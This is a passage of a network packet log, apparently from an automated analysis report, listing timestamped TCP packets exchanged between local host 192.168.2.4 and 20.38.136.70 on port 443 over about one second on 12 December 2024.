                                                                                                                                                                                                          Dec 12, 2024 00:30:02.564953089 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.566395044 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.566473961 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.575637102 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.575706005 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.575989962 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.576051950 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.576515913 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.576585054 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.586625099 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.586744070 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.587161064 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.587241888 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.587388992 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.587452888 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.589423895 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.589521885 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.593045950 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.593111038 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.594881058 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.594940901 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.598748922 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.598809958 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.601989985 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.602056026 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.603785992 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.603882074 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.607400894 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.607470036 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.611912966 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.611996889 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.612328053 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.612406015 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.614476919 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.614552975 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.616274118 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.616362095 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.618613958 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.618683100 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.621110916 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.621180058 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.622288942 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.622371912 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.624669075 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.624746084 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.627141953 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.627230883 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.628545046 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.628623962 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.630552053 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.630615950 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.632730961 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.632821083 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.634233952 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.634294033 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.740859032 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.741086006 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.742028952 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.742105961 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.743957043 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.744048119 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.744925976 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.745007992 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.746711016 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.746798038 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.748498917 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.748564005 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.753952980 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.754030943 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.754991055 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.755059004 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.755903006 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.755975962 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.757612944 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.757689953 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.759146929 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.759217024 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.760200024 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.760272980 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.762542009 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.762614965 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.763459921 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.763525009 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.765185118 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.765270948 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.766706944 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.766773939 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.767676115 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.767745018 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.769409895 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.769485950 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.770117044 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.770181894 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.771784067 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.771853924 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.774040937 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.774118900 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.774463892 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.774524927 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.776732922 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.776799917 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.777800083 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.777868032 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.778455973 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.778521061 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.780641079 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.780721903 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.781359911 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.781430006 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.783080101 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.783147097 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.784610033 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.784684896 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.785669088 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.785733938 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.787349939 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.787414074 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.788795948 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.788870096 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.933568954 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.933686018 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.934674025 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.934860945 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.935645103 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.935715914 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.937201977 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.937278032 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.938951015 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.939019918 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.939994097 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.940064907 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.946444035 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.946558952 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.947511911 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.947593927 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.949048996 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.949116945 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.950634003 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.950700998 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.951545000 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.951615095 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.953421116 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.953490019 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.954914093 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.954987049 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.955966949 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.956033945 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.957546949 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.957632065 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.958961964 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.959034920 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.960248947 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.960330009 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.961812973 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.961894989 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.963459969 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.963548899 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.964191914 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.964272022 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.966258049 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.966327906 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.967451096 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.967526913 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.968379974 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.968466997 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.970123053 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.970201969 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.971693993 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.971769094 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.972902060 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.972979069 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.974590063 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.974658966 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.975455046 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.975548029 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.977149010 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.977227926 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.978701115 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.978796959 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.979713917 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.979789019 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.981442928 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:02.981519938 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.125618935 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.125823021 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.126616001 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.126703024 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.128041983 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.128113985 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.129651070 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.129723072 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.130810976 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.130893946 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.132306099 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.132381916 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.139533997 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.139625072 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.139668941 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.139755011 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.141416073 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.141484976 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.143030882 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.143100977 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.144200087 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.144265890 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.145422935 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.145486116 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.147520065 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.147607088 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.148744106 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.148819923 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.149796963 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.149893045 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.151492119 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.151559114 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.152143002 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.152224064 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.154213905 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.154283047 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.155519009 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.155586004 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.156403065 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.156474113 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.158602953 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.158668041 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.159481049 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.159554005 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.161292076 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.161376953 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.163033962 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.163105965 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.163897991 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.163975954 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.165164948 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.165235996 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.166765928 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.166842937 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.167525053 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.167593956 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.169552088 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.169616938 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.170917988 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.170981884 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.173401117 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.173475027 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.173521042 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.173602104 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.318221092 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.318551064 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.319556952 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.319645882 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.320841074 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.320921898 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.321971893 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.322048903 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.323733091 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.323801041 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.324543953 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.324615955 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.331518888 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.331600904 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.332607985 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.332676888 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.333761930 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.333837986 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.335505962 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.335587025 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.336936951 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.337018967 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.338284016 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.338361025 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.339238882 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.339318991 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.340914011 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.340981960 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.342488050 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.342555046 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.343514919 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.343585014 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.345335960 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.345411062 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.346626997 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.346693993 CET49990443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.347696066 CET4434999020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.347778082 CET49990443192.168.2.420.38.136.70
